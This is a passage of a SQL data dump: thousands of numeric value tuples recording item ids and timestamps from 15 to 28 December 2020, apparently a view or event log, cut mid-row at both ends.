17:56:28'),(9927,1604,1,'2020-12-15','2020-12-15 17:57:00'),(9928,3087,1,'2020-12-15','2020-12-15 20:50:00'),(9929,108,1,'2020-12-15','2020-12-15 21:10:51'),(9930,1588,1,'2020-12-15','2020-12-15 21:21:03'),(9931,1600,1,'2020-12-15','2020-12-15 22:27:02'),(9932,1600,1,'2020-12-15','2020-12-15 22:27:12'),(9933,3069,1,'2020-12-15','2020-12-15 22:41:37'),(9934,1596,1,'2020-12-15','2020-12-15 23:21:42'),(9935,1606,1,'2020-12-16','2020-12-16 00:42:27'),(9936,1586,1,'2020-12-16','2020-12-16 02:32:45'),(9937,3060,1,'2020-12-16','2020-12-16 02:59:03'),(9938,2989,1,'2020-12-16','2020-12-16 05:45:32'),(9939,76,1,'2020-12-16','2020-12-16 05:46:30'),(9940,2309,1,'2020-12-16','2020-12-16 08:53:22'),(9941,2309,1,'2020-12-16','2020-12-16 10:02:14'),(9942,2159,1,'2020-12-16','2020-12-16 10:19:42'),(9943,91,1,'2020-12-16','2020-12-16 10:51:34'),(9944,2309,1,'2020-12-16','2020-12-16 10:52:36'),(9945,2309,1,'2020-12-16','2020-12-16 10:53:08'),(9946,80,1,'2020-12-16','2020-12-16 10:53:13'),(9947,3005,1,'2020-12-16','2020-12-16 10:54:49'),(9948,2309,1,'2020-12-16','2020-12-16 10:58:19'),(9949,89,1,'2020-12-16','2020-12-16 10:58:52'),(9950,2309,1,'2020-12-16','2020-12-16 11:02:26'),(9951,3083,1,'2020-12-16','2020-12-16 11:19:13'),(9952,74,1,'2020-12-16','2020-12-16 11:20:14'),(9953,2503,1,'2020-12-16','2020-12-16 11:20:35'),(9954,76,1,'2020-12-16','2020-12-16 11:21:39'),(9955,335,1,'2020-12-16','2020-12-16 11:21:54'),(9956,1606,1,'2020-12-16','2020-12-16 12:08:35'),(9957,1596,1,'2020-12-16','2020-12-16 12:45:51'),(9958,68,1,'2020-12-16','2020-12-16 12:53:18'),(9959,68,1,'2020-12-16','2020-12-16 12:54:00'),(9960,76,1,'2020-12-16','2020-12-16 12:54:04'),(9961,1606,1,'2020-12-16','2020-12-16 13:00:39'),(9962,1606,1,'2020-12-16','2020-12-16 13:01:00'),(9963,68,1,'2020-12-16','2020-12-16 13:02:01'),(9964,68,1,'2020-12-16','2020-12-16 13:02:07'),(9965,1596,1,'2020-12-16','2020-12-16 13:02:10'),(9966,1768,1,'2020-12-16','2020-12-16 13:21:04'),(9967,3109,1,'2020-12-16','2020-12-16 13:27:45'),(9968,2154,1,'2020-12-16','2020-12-16 14:55:49'),(9969,1598,1,'2020-12-16','2020-12-16 16:36:50'),(9970,3005,1,'2020-12-16','2020-12-16 17:26:51'),(9971,1596,1,'2020-12-16','2020-12-16 17:27:50'),(9972,2309,1,'2020-12-16','2020-12-16 18:28:30'),(9973,1606,1,'2020-12-16','2020-12-16 18:37:28'),(9974,467,1,'2020-12-16','2020-12-16 19:09:03'),(9975,467,1,'2020-12-16','2020-12-16 19:09:36'),(9976,1586,1,'2020-12-16','2020-12-16 21:19:07'),(9977,1600,1,'2020-12-16','2020-12-16 21:53:12'),(9978,1606,1,'2020-12-16','2020-12-16 23:58:14'),(9979,2617,1,'2020-12-17','2020-12-17 00:05:44'),(9980,1598,1,'2020-12-17','2020-12-17 00:18:14'),(9981,1778,1,'2020-12-17','2020-12-17 01:37:20'),(9982,1778,1,'2020-12-17','2020-12-17 01:48:24'),(9983,1778,1,'2020-12-17','2020-12-17 01:50:30'),(9984,1778,1,'2020-12-17','2020-12-17 01:52:17'),(9985,1737,1,'2020-12-17','2020-12-17 02:09:11'),(9986,1606,1,'2020-12-17','2020-12-17 03:19:30'),(9987,1600,1,'2020-12-17','2020-12-17 07:09:02'),(9988,1739,1,'2020-12-17','2020-12-17 07:10:16'),(9989,1600,1,'2020-12-17','2020-12-17 07:14:56'),(9990,1715,1,'2020-12-17','2020-12-17 07:16:02'),(9991,1600,1,'2020-12-17','2020-12-17 07:17:15'),(9992,91,1,'2020-12-17','2020-12-17 07:46:37'),(9993,3267,1,'2020-12-17','2020-12-17 07:47:04'),(9994,3124,1,'2020-12-17','2020-12-17 08:31:31'),(9995,3124,1,'2020-12-17','2020-12-17 08:37:22'),(9996,3226,1,'2020-12-17','2020-12-17 08:52:31'),(9997,91,1,'2020-12-17','2020-12-17 10:48:31'),(9998,1600,1,'2020-12-17','2020-12-17 11:14:05'),(9999,2769,1,'2020-12-17','2020-12-17 11:18:56'),(10000,1709,1,'2020-12-17','2020-12-17 11:33:50'),(10001,2309,1,'2020-12-17','2020-12-17 12:04:33'),(10002,1766,1,'2020-12-17','2020-12-17 12:24:02'),(10003,3072,1,'2020-12-17','2020-12-17 12:24:59'),(10004,108,1,'2020-12-17','2020-12-17 12:54:09'),(10005,1614,1,'2020-12-17','2020-12-17 13:33:17'),(10006,1598,1,'2020-12-17','2020-12-17 14:35:34'),(10007,2309,1,'2020-12-17','2020-12-17 15:16:06'),(10008,2309,1,'2020-12-17','2020-12-17 15:16:53'),(10009,2309,1,'2020-12-17','2020-12-17 15:20:16'),(10010,2309,1,'2020-12-17','2020-12-17 15:27:04'),(10011,1604,1,'2020-12-17','2020-12-17 15:29:49'),(10012,68,1,'2020-12-17','2020-12-17 15:30:33'),(10013,1604,1,'2020-12-17','2020-12-17 15:30:50'),(10014,1604,1,'2020-12-17','2020-12-17 15:31:01'),(10015,80,1,'2020-12-17','2020-12-17 15:31:26'),(10016,76,1,'2020-12-17','2020-12-17 15:32:39'),(10017,3034,1,'2020-12-17','2020-12-17 15:42:30'),(10018,1588,1,'2020-12-17','2020-12-17 16:15:16'),(10019,2751,1,'2020-12-17','2020-12-17 18:27:31'),(10020,2410,1,'2020-12-17','2020-12-17 18:46:52'),(10021,570,1,'2020-12-17','2020-12-17 19:37:30'),(10022,467,1,'2020-12-17','2020-12-17 20:18:27'),(10023,1600,1,'2020-12-17','2020-12-17 21:10:34'),(10024,3030,1,'2020-12-17','2020-12-17 21:22:14'),(10025,1600,1,'2020-12-17','2020-12-17 22:10:51'),(10026,2309,1,'2020-12-17','2020-12-17 22:27:19'),(10027,1600,1,'2020-12-17','2020-12-17 22:47:03'),(10028,1600,1,'2020-12-17','2020-12-17 23:08:33'),(10029,3287,1,'2020-12-17','2020-12-17 23:09:51'),(10030,1600,1,'2020-12-17','2020-12-17 23:10:58'),(10031,2248,1,'2020-12-18','2020-12-18 01:48:02'),(10032,1604,1,'2020-12-18','2020-12-18 04:57:45'),(10033,1588,1,'2020-12-18','2020-12-18 08:40:25'),(10034,1600,1,'2020-12-18','2020-12-18 09:40:59'),(10035,1614,1,'2020-12-18','2020-12-18 10:05:21'),(10036,1604,1,'2020-12-18','2020-12-18 12:24:57'),(10037,1598,1,'2020-12-18','2020-12-18 12:40:48'),(10038,3058,1,'2020-12-18','2020-12-18 14:32:56'),(10039,1598,1,'2020-12-18','2020-12-18 15:44:59'),(10040,1544,1,'2020-12-18','2020-12-18 18:43:55'),(10041,1586,1,'2020-12-18','2020-12-18 20:04:43'),(10042,1699,1,'2020-12-18','2020-12-18 20:06:17'),(10043,1586,1,'2020-12-18','2020-12-18 20:06:38'),(10044,2609,1,'2020-12-18','2020-12-18 20:07:00'),(10045,1586,1,'2020-12-18','2020-12-18 20:33:10'),(10046,68,1,'2020-12-18','2020-12-18 21:53:07'),(10047,1600,1,'2020-12-18','2020-12-18 23:17:16'),(10048,3178,1,'2020-12-18','2020-12-18 23:24:47'),(10049,2956,1,'2020-12-19','2020-12-19 00:45:26'),(10050,2609,1,'2020-12-19','2020-12-19 07:40:33'),(10051,1582,1,'2020-12-19','2020-12-19 07:57:27'),(10052,1606,1,'2020-12-19','2020-12-19 08:09:28'),(10053,3180,1,'2020-12-19','2020-12-19 09:34:23'),(10054,3083,1,'2020-12-19','2020-12-19 10:34:15'),(10055,1606,1,'2020-12-19','2020-12-19 10:42:30'),(10056,76,1,'2020-12-19','2020-12-19 10:55:21'),(10057,1600,1,'2020-12-19','2020-12-19 10:59:05'),(10058,470,1,'2020-12-19','2020-12-19 11:04:44'),(10059,1544,1,'2020-12-19','2020-12-19 12:05:56'),(10060,76,1,'2020-12-19','2020-12-19 12:06:08'),(10061,2309,1,'2020-12-19','2020-12-19 13:52:40'),(10062,1614,1,'2020-12-19','2020-12-19 14:15:04'),(10063,72,1,'2020-12-19','2020-12-19 14:54:56'),(10064,2309,1,'2020-12-19','2020-12-19 15:32:45'),(10065,2309,1,'2020-12-19','2020-12-19 15:32:55'),(10066,72,1,'2020-12-19','2020-12-19 15:46:07'),(10067,89,1,'2020-12-19','2020-12-19 15:55:38'),(10068,1582,1,'2020-12-19','2020-12-19 17:16:04'),(10069,1734,1,'2020-12-19','2020-12-19 18:16:57'),(10070,1772,1,'2020-12-19','2020-12-19 18:32:03'),(10071,485,1,'2020-12-19','2020-12-19 19:47:24'),(10072,2609,1,'2020-12-19','2020-12-19 19:51:44'),(10073,1586,1,'2020-12-19','2020-12-19 19:53:32'),(10074,1586,1,'2020-12-19','2020-12-19 19:54:41'),(10075,2178,1,'2020-12-19','2020-12-19 20:06:11'),(10076,2309,1,'2020-12-19','2020-12-19 20:30:01'),(10077,2148,1,'2020-12-19','2020-12-19 21:06:53'),(10078,2775,1,'2020-12-19','2020-12-19 21:55:23'),(10079,1614,1,'2020-12-19','2020-12-19 23:37:28'),(10080,3034,1,'2020-12-20','2020-12-20 00:25:11'),(10081,1586,1,'2020-12-20','2020-12-20 01:05:10'),(10082,2769,1,'2020-12-20','2020-12-20 01:25:13'),(10083,2609,1,'2020-12-20','2020-12-20 02:05:01'),(10084,2159,1,'2020-12-20','2020-12-20 02:25:08'),(10085,1614,1,'2020-12-20','2020-12-20 03:35:40'),(10086,1600,1,'2020-12-20','2020-12-20 03:56:00'),(10087,1586,1,'2020-12-20','2020-12-20 04:36:19'),(10088,2813,1,'2020-12-20','2020-12-20 05:27:29'),(10089,1588,1,'2020-12-20','2020-12-20 05:37:52'),(10090,1596,1,'2020-12-20','2020-12-20 06:01:41'),(10091,2769,1,'2020-12-20','2020-12-20 06:49:02'),(10092,1604,1,'2020-12-20','2020-12-20 06:58:58'),(10093,2309,1,'2020-12-20','2020-12-20 07:18:59'),(10094,2989,1,'2020-12-20','2020-12-20 08:29:29'),(10095,2801,1,'2020-12-20','2020-12-20 08:49:48'),(10096,2609,1,'2020-12-20','2020-12-20 09:15:10'),(10097,91,1,'2020-12-20','2020-12-20 09:40:28'),(10098,3087,1,'2020-12-20','2020-12-20 09:44:54'),(10099,91,1,'2020-12-20','2020-12-20 09:46:28'),(10100,1604,1,'2020-12-20','2020-12-20 10:30:31'),(10101,1612,1,'2020-12-20','2020-12-20 10:40:32'),(10102,1718,1,'2020-12-20','2020-12-20 11:10:39'),(10103,68,1,'2020-12-20','2020-12-20 11:20:40'),(10104,2159,1,'2020-12-20','2020-12-20 11:40:28'),(10105,2159,1,'2020-12-20','2020-12-20 12:10:51'),(10106,2159,1,'2020-12-20','2020-12-20 12:34:35'),(10107,2159,1,'2020-12-20','2020-12-20 12:55:22'),(10108,1600,1,'2020-12-20','2020-12-20 13:11:02'),(10109,1588,1,'2020-12-20','2020-12-20 14:31:30'),(10110,2769,1,'2020-12-20','2020-12-20 15:21:53'),(10111,1703,1,'2020-12-20','2020-12-20 15:31:47'),(10112,1614,1,'2020-12-20','2020-12-20 16:23:16'),(10113,2309,1,'2020-12-20','2020-12-20 17:02:08'),(10114,2617,1,'2020-12-20','2020-12-20 18:13:09'),(10115,68,1,'2020-12-20','2020-12-20 20:43:58'),(10116,2309,1,'2020-12-20','2020-12-20 21:03:56'),(10117,3083,1,'2020-12-20','2020-12-20 21:33:59'),(10118,1604,1,'2020-12-20','2020-12-20 23:15:55'),(10119,1600,1,'2020-12-20','2020-12-20 23:16:00'),(10120,1544,1,'2020-12-20','2020-12-20 23:16:34'),(10121,1586,1,'2020-12-20','2020-12-20 23:16:50'),(10122,1604,1,'2020-12-20','2020-12-20 23:16:56'),(10123,2457,1,'2020-12-20','2020-12-20 23:17:19'),(10124,1604,1,'2020-12-20','2020-12-20 23:17:35'),(10125,3079,1,'2020-12-20','2020-12-20 23:21:33'),(10126,80,1,'2020-12-20','2020-12-20 23:41:38'),(10127,1600,1,'2020-12-21','2020-12-21 00:21:31'),(10128,76,1,'2020-12-21','2020-12-21 00:41:44'),(10129,1604,1,'2020-12-21','2020-12-21 04:32:41'),(10130,1582,1,'2020-12-21','2020-12-21 05:03:05'),(10131,1614,1,'2020-12-21','2020-12-21 05:13:04'),(10132,2159,1,'2020-12-21','2020-12-21 06:12:55'),(10133,2309,1,'2020-12-21','2020-12-21 06:23:02'),(10134,3107,1,'2020-12-21','2020-12-21 07:47:45'),(10135,570,1,'2020-12-21','2020-12-21 08:33:57'),(10136,3092,1,'2020-12-21','2020-12-21 08:59:42'),(10137,3178,1,'2020-12-21','2020-12-21 09:24:39'),(10138,1588,1,'2020-12-21','2020-12-21 09:55:09'),(10139,2159,1,'2020-12-21','2020-12-21 10:02:57'),(10140,2769,1,'2020-12-21','2020-12-21 10:24:55'),(10141,1586,1,'2020-12-21','2020-12-21 11:00:46'),(10142,2751,1,'2020-12-21','2020-12-21 11:06:45'),(10143,2309,1,'2020-12-21','2020-12-21 11:36:05'),(10144,2309,1,'2020-12-21','2020-12-21 11:36:07'),(10145,2309,1,'2020-12-21','2020-12-21 11:36:07'),(10146,2609,1,'2020-12-21','2020-12-21 12:16:05'),(10147,2309,1,'2020-12-21','2020-12-21 12:26:07'),(10148,2159,1,'2020-12-21','2020-12-21 13:23:37'),(10149,1604,1,'2020-12-21','2020-12-21 13:36:47'),(10150,2457,1,'2020-12-21','2020-12-21 13:46:58'),(10151,2609,1,'2020-12-21','2020-12-21 14:16:53'),(10152,1588,1,'2020-12-21','2020-12-21 14:37:19'),(10153,91,1,'2020-12-21','2020-12-21 14:38:35'),(10154,1588,1,'2020-12-21','2020-12-21 14:39:27'),(10155,1588,1,'2020-12-21','2020-12-21 14:39:38'),(10156,1600,1,'2020-12-21','2020-12-21 15:16:54'),(10157,1614,1,'2020-12-21','2020-12-21 15:37:04'),(10158,2309,1,'2020-12-21','2020-12-21 15:58:55'),(10159,2309,1,'2020-12-21','2020-12-21 16:17:13'),(10160,3005,1,'2020-12-21','2020-12-21 16:57:36'),(10161,470,1,'2020-12-21','2020-12-21 17:12:50'),(10162,2751,1,'2020-12-21','2020-12-21 17:13:32'),(10163,72,1,'2020-12-21','2020-12-21 17:13:44'),(10164,108,1,'2020-12-21','2020-12-21 17:14:02'),(10165,2159,1,'2020-12-21','2020-12-21 17:27:21'),(10166,570,1,'2020-12-21','2020-12-21 17:47:25'),(10167,1600,1,'2020-12-21','2020-12-21 17:57:23'),(10168,2769,1,'2020-12-21','2020-12-21 18:57:52'),(10169,2751,1,'2020-12-21','2020-12-21 20:07:26'),(10170,1610,1,'2020-12-21','2020-12-21 22:27:07'),(10171,2457,1,'2020-12-21','2020-12-21 22:57:08'),(10172,1600,1,'2020-12-22','2020-12-22 00:18:09'),(10173,335,1,'2020-12-22','2020-12-22 00:28:26'),(10174,2904,1,'2020-12-22','2020-12-22 00:38:05'),(10175,1614,1,'2020-12-22','2020-12-22 01:08:36'),(10176,1604,1,'2020-12-22','2020-12-22 02:49:34'),(10177,1600,1,'2020-12-22','2020-12-22 03:19:14'),(10178,570,1,'2020-12-22','2020-12-22 03:40:48'),(10179,3041,1,'2020-12-22','2020-12-22 03:47:26'),(10180,2159,1,'2020-12-22','2020-12-22 04:09:32'),(10181,91,1,'2020-12-22','2020-12-22 04:30:12'),(10182,1586,1,'2020-12-22','2020-12-22 04:40:15'),(10183,2309,1,'2020-12-22','2020-12-22 04:50:16'),(10184,3069,1,'2020-12-22','2020-12-22 05:10:40'),(10185,84,1,'2020-12-22','2020-12-22 05:40:51'),(10186,2609,1,'2020-12-22','2020-12-22 06:34:19'),(10187,1604,1,'2020-12-22','2020-12-22 06:52:29'),(10188,1594,1,'2020-12-22','2020-12-22 07:19:06'),(10189,1594,1,'2020-12-22','2020-12-22 07:19:08'),(10190,1594,1,'2020-12-22','2020-12-22 07:19:27'),(10191,1594,1,'2020-12-22','2020-12-22 07:19:59'),(10192,2252,1,'2020-12-22','2020-12-22 08:43:52'),(10193,2309,1,'2020-12-22','2020-12-22 09:33:48'),(10194,2309,1,'2020-12-22','2020-12-22 09:33:51'),(10195,2956,1,'2020-12-22','2020-12-22 09:54:47'),(10196,1600,1,'2020-12-22','2020-12-22 09:56:30'),(10197,2309,1,'2020-12-22','2020-12-22 09:57:37'),(10198,2309,1,'2020-12-22','2020-12-22 10:07:16'),(10199,3087,1,'2020-12-22','2020-12-22 10:27:12'),(10200,2309,1,'2020-12-22','2020-12-22 10:43:56'),(10201,2309,1,'2020-12-22','2020-12-22 10:43:57'),(10202,2309,1,'2020-12-22','2020-12-22 11:24:14'),(10203,1600,1,'2020-12-22','2020-12-22 11:41:30'),(10204,2159,1,'2020-12-22','2020-12-22 11:44:21'),(10205,2159,1,'2020-12-22','2020-12-22 11:44:24'),(10206,2309,1,'2020-12-22','2020-12-22 11:53:03'),(10207,2309,1,'2020-12-22','2020-12-22 11:53:05'),(10208,2309,1,'2020-12-22','2020-12-22 12:07:39'),(10209,1598,1,'2020-12-22','2020-12-22 12:52:04'),(10210,80,1,'2020-12-22','2020-12-22 12:53:37'),(10211,1598,1,'2020-12-22','2020-12-22 12:56:41'),(10212,80,1,'2020-12-22','2020-12-22 12:56:58'),(10213,1598,1,'2020-12-22','2020-12-22 12:57:08'),(10214,1600,1,'2020-12-22','2020-12-22 13:02:10'),(10215,1588,1,'2020-12-22','2020-12-22 13:02:12'),(10216,91,1,'2020-12-22','2020-12-22 13:03:25'),(10217,1600,1,'2020-12-22','2020-12-22 13:05:07'),(10218,1588,1,'2020-12-22','2020-12-22 13:05:22'),(10219,570,1,'2020-12-22','2020-12-22 13:25:37'),(10220,2159,1,'2020-12-22','2020-12-22 13:35:51'),(10221,1612,1,'2020-12-22','2020-12-22 13:38:58'),(10222,1604,1,'2020-12-22','2020-12-22 13:55:46'),(10223,2309,1,'2020-12-22','2020-12-22 14:56:55'),(10224,2161,1,'2020-12-22','2020-12-22 15:04:28'),(10225,2751,1,'2020-12-22','2020-12-22 15:08:03'),(10226,1582,1,'2020-12-22','2020-12-22 15:11:33'),(10227,1582,1,'2020-12-22','2020-12-22 15:12:15'),(10228,3247,1,'2020-12-22','2020-12-22 15:14:17'),(10229,1582,1,'2020-12-22','2020-12-22 15:16:01'),(10230,2457,1,'2020-12-22','2020-12-22 15:37:06'),(10231,1602,1,'2020-12-22','2020-12-22 16:07:21'),(10232,2309,1,'2020-12-22','2020-12-22 16:27:35'),(10233,2309,1,'2020-12-22','2020-12-22 16:27:36'),(10234,1600,1,'2020-12-22','2020-12-22 17:24:39'),(10235,1600,1,'2020-12-22','2020-12-22 18:28:14'),(10236,2609,1,'2020-12-22','2020-12-22 19:18:43'),(10237,1592,1,'2020-12-22','2020-12-22 19:39:01'),(10238,1600,1,'2020-12-22','2020-12-22 20:01:23'),(10239,468,1,'2020-12-22','2020-12-22 20:10:48'),(10240,89,1,'2020-12-22','2020-12-22 20:32:19'),(10241,3041,1,'2020-12-22','2020-12-22 21:56:43'),(10242,2309,1,'2020-12-22','2020-12-22 22:09:46'),(10243,2159,1,'2020-12-22','2020-12-22 22:20:09'),(10244,2309,1,'2020-12-22','2020-12-22 22:27:23'),(10245,1600,1,'2020-12-22','2020-12-22 22:49:16'),(10246,1741,1,'2020-12-22','2020-12-22 22:50:31'),(10247,3287,1,'2020-12-22','2020-12-22 22:53:18'),(10248,3117,1,'2020-12-23','2020-12-23 00:25:17'),(10249,2309,1,'2020-12-23','2020-12-23 00:41:05'),(10250,2309,1,'2020-12-23','2020-12-23 01:16:03'),(10251,2309,1,'2020-12-23','2020-12-23 01:16:08'),(10252,3099,1,'2020-12-23','2020-12-23 01:26:56'),(10253,3099,1,'2020-12-23','2020-12-23 01:26:57'),(10254,1600,1,'2020-12-23','2020-12-23 04:51:57'),(10255,2769,1,'2020-12-23','2020-12-23 04:58:29'),(10256,1782,1,'2020-12-23','2020-12-23 06:35:19'),(10257,2309,1,'2020-12-23','2020-12-23 09:47:53'),(10258,2309,1,'2020-12-23','2020-12-23 09:47:53'),(10259,2309,1,'2020-12-23','2020-12-23 09:52:20'),(10260,2309,1,'2020-12-23','2020-12-23 09:54:19'),(10261,2309,1,'2020-12-23','2020-12-23 10:39:56'),(10262,2309,1,'2020-12-23','2020-12-23 10:39:56'),(10263,2159,1,'2020-12-23','2020-12-23 10:55:55'),(10264,2159,1,'2020-12-23','2020-12-23 10:55:55'),(10265,2309,1,'2020-12-23','2020-12-23 11:21:16'),(10266,2309,1,'2020-12-23','2020-12-23 11:21:18'),(10267,2159,1,'2020-12-23','2020-12-23 11:28:49'),(10268,2159,1,'2020-12-23','2020-12-23 11:28:49'),(10269,2159,1,'2020-12-23','2020-12-23 11:32:04'),(10270,2309,1,'2020-12-23','2020-12-23 12:00:31'),(10271,2309,1,'2020-12-23','2020-12-23 12:00:33'),(10272,3287,1,'2020-12-23','2020-12-23 12:13:09'),(10273,3038,1,'2020-12-23','2020-12-23 12:20:58'),(10274,2309,1,'2020-12-23','2020-12-23 12:33:53'),(10275,2309,1,'2020-12-23','2020-12-23 12:36:15'),(10276,2309,1,'2020-12-23','2020-12-23 12:36:17'),(10277,2309,1,'2020-12-23','2020-12-23 12:41:52'),(10278,2309,1,'2020-12-23','2020-12-23 12:41:52'),(10279,91,1,'2020-12-23','2020-12-23 13:26:29'),(10280,1600,1,'2020-12-23','2020-12-23 13:30:18'),(10281,2904,1,'2020-12-23','2020-12-23 13:55:13'),(10282,2904,1,'2020-12-23','2020-12-23 14:00:41'),(10283,3087,1,'2020-12-23','2020-12-23 14:10:02'),(10284,2309,1,'2020-12-23','2020-12-23 14:22:47'),(10285,2309,1,'2020-12-23','2020-12-23 14:22:47'),(10286,2309,1,'2020-12-23','2020-12-23 14:24:28'),(10287,2609,1,'2020-12-23','2020-12-23 14:51:39'),(10288,2309,1,'2020-12-23','2020-12-23 15:13:38'),(10289,1600,1,'2020-12-23','2020-12-23 22:10:51'),(10290,1747,1,'2020-12-24','2020-12-24 00:35:11'),(10291,2309,1,'2020-12-24','2020-12-24 01:11:43'),(10292,2309,1,'2020-12-24','2020-12-24 03:19:19'),(10293,1606,1,'2020-12-24','2020-12-24 10:33:28'),(10294,2159,1,'2020-12-24','2020-12-24 12:00:01'),(10295,1594,1,'2020-12-24','2020-12-24 12:02:33'),(10296,1586,1,'2020-12-24','2020-12-24 12:19:03'),(10297,80,1,'2020-12-24','2020-12-24 12:20:33'),(10298,1586,1,'2020-12-24','2020-12-24 12:22:44'),(10299,1606,1,'2020-12-24','2020-12-24 13:16:59'),(10300,1586,1,'2020-12-24','2020-12-24 13:44:22'),(10301,2159,1,'2020-12-24','2020-12-24 13:44:25'),(10302,1586,1,'2020-12-24','2020-12-24 14:06:30'),(10303,108,1,'2020-12-24','2020-12-24 14:54:40'),(10304,2178,1,'2020-12-24','2020-12-24 18:35:55'),(10305,1600,1,'2020-12-24','2020-12-24 21:26:20'),(10306,1592,1,'2020-12-24','2020-12-24 21:52:59'),(10307,473,1,'2020-12-25','2020-12-25 02:48:34'),(10308,1600,1,'2020-12-25','2020-12-25 05:59:35'),(10309,2309,1,'2020-12-25','2020-12-25 14:55:32'),(10310,2309,1,'2020-12-25','2020-12-25 14:55:33'),(10311,474,1,'2020-12-25','2020-12-25 16:12:49'),(10312,91,1,'2020-12-25','2020-12-25 16:50:07'),(10313,2309,1,'2020-12-25','2020-12-25 17:16:13'),(10314,2309,1,'2020-12-25','2020-12-25 17:16:14'),(10315,2159,1,'2020-12-25','2020-12-25 17:34:04'),(10316,2159,1,'2020-12-25','2020-12-25 17:34:04'),(10317,2420,1,'2020-12-25','2020-12-25 18:12:40'),(10318,3240,1,'2020-12-25','2020-12-25 20:39:14'),(10319,1586,1,'2020-12-25','2020-12-25 20:47:28'),(10320,2159,1,'2020-12-25','2020-12-25 20:57:27'),(10321,2159,1,'2020-12-25','2020-12-25 20:57:30'),(10322,2159,1,'2020-12-25','2020-12-25 20:57:53'),(10323,2159,1,'2020-12-25','2020-12-25 20:58:03'),(10324,1718,1,'2020-12-25','2020-12-25 21:27:01'),(10325,3117,1,'2020-12-25','2020-12-25 22:35:50'),(10326,477,1,'2020-12-26','2020-12-26 04:47:36'),(10327,3090,1,'2020-12-26','2020-12-26 06:48:45'),(10328,1600,1,'2020-12-26','2020-12-26 07:38:47'),(10329,1586,1,'2020-12-26','2020-12-26 09:25:50'),(10330,1586,1,'2020-12-26','2020-12-26 09:29:28'),(10331,1586,1,'2020-12-26','2020-12-26 09:31:15'),(10332,1584,1,'2020-12-26','2020-12-26 09:59:08'),(10333,1604,1,'2020-12-26','2020-12-26 10:09:04'),(10334,1600,1,'2020-12-26','2020-12-26 12:13:56'),(10335,1600,1,'2020-12-26','2020-12-26 12:14:11'),(10336,1741,1,'2020-12-26','2020-12-26 12:15:24'),(10337,1600,1,'2020-12-26','2020-12-26 12:16:01'),(10338,1600,1,'2020-12-26','2020-12-26 14:16:32'),(10339,1766,1,'2020-12-26','2020-12-26 14:17:52'),(10340,1766,1,'2020-12-26','2020-12-26 14:18:44'),(10341,1600,1,'2020-12-26','2020-12-26 14:23:11'),(10342,87,1,'2020-12-26','2020-12-26 14:24:46'),(10343,1730,1,'2020-12-26','2020-12-26 15:31:45'),(10344,1596,1,'2020-12-26','2020-12-26 17:01:45'),(10345,1596,1,'2020-12-26','2020-12-26 17:11:45'),(10346,1600,1,'2020-12-26','2020-12-26 17:21:47'),(10347,2309,1,'2020-12-26','2020-12-26 17:41:35'),(10348,3280,1,'2020-12-26','2020-12-26 18:11:55'),(10349,2159,1,'2020-12-26','2020-12-26 18:21:44'),(10350,3087,1,'2020-12-26','2020-12-26 18:51:44'),(10351,3006,1,'2020-12-26','2020-12-26 19:18:28'),(10352,1604,1,'2020-12-26','2020-12-26 19:21:41'),(10353,1604,1,'2020-12-26','2020-12-26 19:51:12'),(10354,2751,1,'2020-12-26','2020-12-26 22:31:42'),(10355,3005,1,'2020-12-26','2020-12-26 23:12:18'),(10356,1766,1,'2020-12-27','2020-12-27 00:12:56'),(10357,2410,1,'2020-12-27','2020-12-27 02:14:25'),(10358,2159,1,'2020-12-27','2020-12-27 03:34:22'),(10359,3280,1,'2020-12-27','2020-12-27 03:44:21'),(10360,1747,1,'2020-12-27','2020-12-27 04:44:50'),(10361,1747,1,'2020-12-27','2020-12-27 05:01:11'),(10362,1604,1,'2020-12-27','2020-12-27 05:37:12'),(10363,1774,1,'2020-12-27','2020-12-27 06:25:22'),(10364,1600,1,'2020-12-27','2020-12-27 06:36:38'),(10365,91,1,'2020-12-27','2020-12-27 08:22:13'),(10366,1600,1,'2020-12-27','2020-12-27 09:00:55'),(10367,2309,1,'2020-12-27','2020-12-27 09:04:30'),(10368,1600,1,'2020-12-27','2020-12-27 09:55:36'),(10369,80,1,'2020-12-27','2020-12-27 09:56:37'),(10370,1600,1,'2020-12-27','2020-12-27 09:56:51'),(10371,1600,1,'2020-12-27','2020-12-27 09:57:35'),(10372,1718,1,'2020-12-27','2020-12-27 11:06:17'),(10373,2248,1,'2020-12-27','2020-12-27 11:31:23'),(10374,2248,1,'2020-12-27','2020-12-27 11:33:02'),(10375,3087,1,'2020-12-27','2020-12-27 11:34:15'),(10376,2248,1,'2020-12-27','2020-12-27 11:34:19'),(10377,2617,1,'2020-12-27','2020-12-27 12:26:40'),(10378,3280,1,'2020-12-27','2020-12-27 12:36:47'),(10379,2813,1,'2020-12-27','2020-12-27 13:07:08'),(10380,2159,1,'2020-12-27','2020-12-27 13:27:16'),(10381,1604,1,'2020-12-27','2020-12-27 14:37:57'),(10382,80,1,'2020-12-27','2020-12-27 15:17:57'),(10383,1604,1,'2020-12-27','2020-12-27 15:48:22'),(10384,2159,1,'2020-12-27','2020-12-27 16:03:07'),(10385,1600,1,'2020-12-27','2020-12-27 16:08:21'),(10386,488,1,'2020-12-27','2020-12-27 16:58:11'),(10387,1586,1,'2020-12-27','2020-12-27 19:05:48'),(10388,2904,1,'2020-12-27','2020-12-27 19:06:05'),(10389,80,1,'2020-12-27','2020-12-27 19:07:07'),(10390,1586,1,'2020-12-27','2020-12-27 19:08:26'),(10391,68,1,'2020-12-27','2020-12-27 19:09:45'),(10392,68,1,'2020-12-27','2020-12-27 19:10:35'),(10393,1586,1,'2020-12-27','2020-12-27 19:10:42'),(10394,1600,1,'2020-12-27','2020-12-27 20:22:13'),(10395,1600,1,'2020-12-27','2020-12-27 20:22:22'),(10396,80,1,'2020-12-27','2020-12-27 20:22:38'),(10397,1600,1,'2020-12-27','2020-12-27 20:25:53'),(10398,1602,1,'2020-12-27','2020-12-27 20:47:30'),(10399,1602,1,'2020-12-27','2020-12-27 20:47:38'),(10400,1730,1,'2020-12-27','2020-12-27 20:48:05'),(10401,1602,1,'2020-12-27','2020-12-27 20:55:10'),(10402,1728,1,'2020-12-27','2020-12-27 20:55:20'),(10403,3280,1,'2020-12-27','2020-12-27 22:00:10'),(10404,1586,1,'2020-12-27','2020-12-27 23:05:27'),(10405,1586,1,'2020-12-27','2020-12-27 23:05:28'),(10406,1598,1,'2020-12-27','2020-12-27 23:44:17'),(10407,1778,1,'2020-12-28','2020-12-28 00:24:24'),(10408,1604,1,'2020-12-28','2020-12-28 01:10:40'),(10409,1600,1,'2020-12-28','2020-12-28 03:50:49'),(10410,2309,1,'2020-12-28','2020-12-28 05:06:55'),(10411,2804,1,'2020-12-28','2020-12-28 07:01:33'),(10412,3045,1,'2020-12-28','2020-12-28 